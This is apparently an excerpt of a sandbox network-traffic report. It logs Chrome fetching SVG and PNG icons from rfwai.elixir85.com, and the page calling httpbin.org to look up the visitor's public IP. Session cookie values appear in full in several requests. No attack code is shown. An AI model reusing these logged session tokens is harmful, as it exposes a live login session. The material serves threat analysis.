                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:26 UTC646INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkRB9NtVpe64kNa7zO%2B6w5wgFEfKryvbIlT63UGLEagm3bN0ljhqNWSIjNZ0ekeWR84ALqvkVg6AVPYC6dpUn4O74kS3bR09Q%2FHrOc7Vm6OAM2xlDq00iMSca35lHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288beae943ff-EWR
                                                        2024-07-03 19:07:26 UTC723INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                        Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38
                                                        Data Ascii: 4 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.598
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32 32 30 35 20 31 32 2e 31 35
                                                        Data Ascii: 9 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2205 12.15
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30
                                                        Data Ascii: 939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6009 44.90
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31 2e 30 38 31 31 43 34 37 2e
                                                        Data Ascii: .3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21.0811C47.
                                                        2024-07-03 19:07:26 UTC1199INData Raw: 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37 20 33 31 2e 33 37 36 34 20
                                                        Data Ascii: 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047 31.3764
                                                        2024-07-03 19:07:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.549820104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1127OUTGET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:26 UTC663INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivLdhO6NYUhWEoDYhF%2BzAb%2B6JQNfcCq9AQkCJcAbt1RU3Ed8DrjPqN1bXCS1GFw6MblCKFGR6xhmNtfae85SMLsjFSfX88fLJhDqt9or9ZOJnNclDdpsq71dvSgM8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288c4e751768-EWR
                                                        2024-07-03 19:07:26 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                        Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                        2024-07-03 19:07:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.549821104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1115OUTGET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:26 UTC655INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GcFO3BhLd%2FU99uAXcqCs1XRfosJLku8MTreTnSyxfIM4rVBHQTcqfTo7g%2FDVyVEswr%2FMudZOyxcJ2ne%2F0g2gcuGvdkuuzO50VDYSUq3RPKHUc0kVbJN68SbtN30Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288c6f035e6d-EWR
                                                        2024-07-03 19:07:26 UTC714INData Raw: 36 37 61 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                        Data Ascii: 67a<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                        2024-07-03 19:07:26 UTC951INData Raw: 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c 31 2e 31 35 2c 31
                                                        Data Ascii: .584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,1
                                                        2024-07-03 19:07:26 UTC1254INData Raw: 34 64 66 0d 0a 39 2d 2e 35 35 37 2c 31 2e 32 36 33 2d 31 2e 32 37 32 61 31 2e 31 38 39 2c 31 2e 31 38 39 2c 30 2c 30 2c 30 2c 2e 33 36 36 2d 2e 38 37 31 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 35 33 41 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 30 2c 33 34 2c 33 34 2e 33 30 39 61 31 34 2e 30 36 2c 31 34 2e 30 36 2c 30 2c 30 2c 30 2d 2e 39 35 38 2d 31 2e 30 33 36 71 2d 2e 35 33 31 2d 2e 35 32 33 2d 31 2e 30 33 36 2d 2e 39 35 38 61 38 2e 39 35 2c 38 2e 39 35 2c 30 2c 30 2c 30 2d 2e 39 33 32 2d 2e 37 31 34 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 36 35 33 2d 2e 32 37 39 2c 31 2e 32 31 34 2c 31 2e 32 31 34 2c 30 2c 30 2c 30 2d 2e 37 2e 32 32 36 2c 34 2e 31 2c 34 2e 31 2c 30 2c 30 2c 30 2d 2e 36 35 33 2e
                                                        Data Ascii: 4df9-.557,1.263-1.272a1.189,1.189,0,0,0,.366-.871,1.382,1.382,0,0,0-.279-.653A10.4,10.4,0,0,0,34,34.309a14.06,14.06,0,0,0-.958-1.036q-.531-.523-1.036-.958a8.95,8.95,0,0,0-.932-.714,1.382,1.382,0,0,0-.653-.279,1.214,1.214,0,0,0-.7.226,4.1,4.1,0,0,0-.653.
                                                        2024-07-03 19:07:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.54981718.214.17.354433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC590OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: application/json, text/javascript, */*; q=0.01
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:26 UTC249INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 30
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: https://rfwai.elixir85.com
                                                        Access-Control-Allow-Credentials: true
                                                        2024-07-03 19:07:26 UTC30INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.33"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.549824104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC1132OUTGET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:27 UTC655INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:27 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 29796
                                                        Connection: close
                                                        Content-Disposition: inline; filename="op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQrIrYwceAgyf1UsgEYw3M1GEfQOnvoQ7Ac3nZaT6s1GMVWu9pbGmYzEimEy3uWy0qPi3pV8E4pgoaYhWHxKyOHyruFXY7wrWUQZerQGdlLwlImVwDKzxqBcmAigxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928929bce4223-EWR
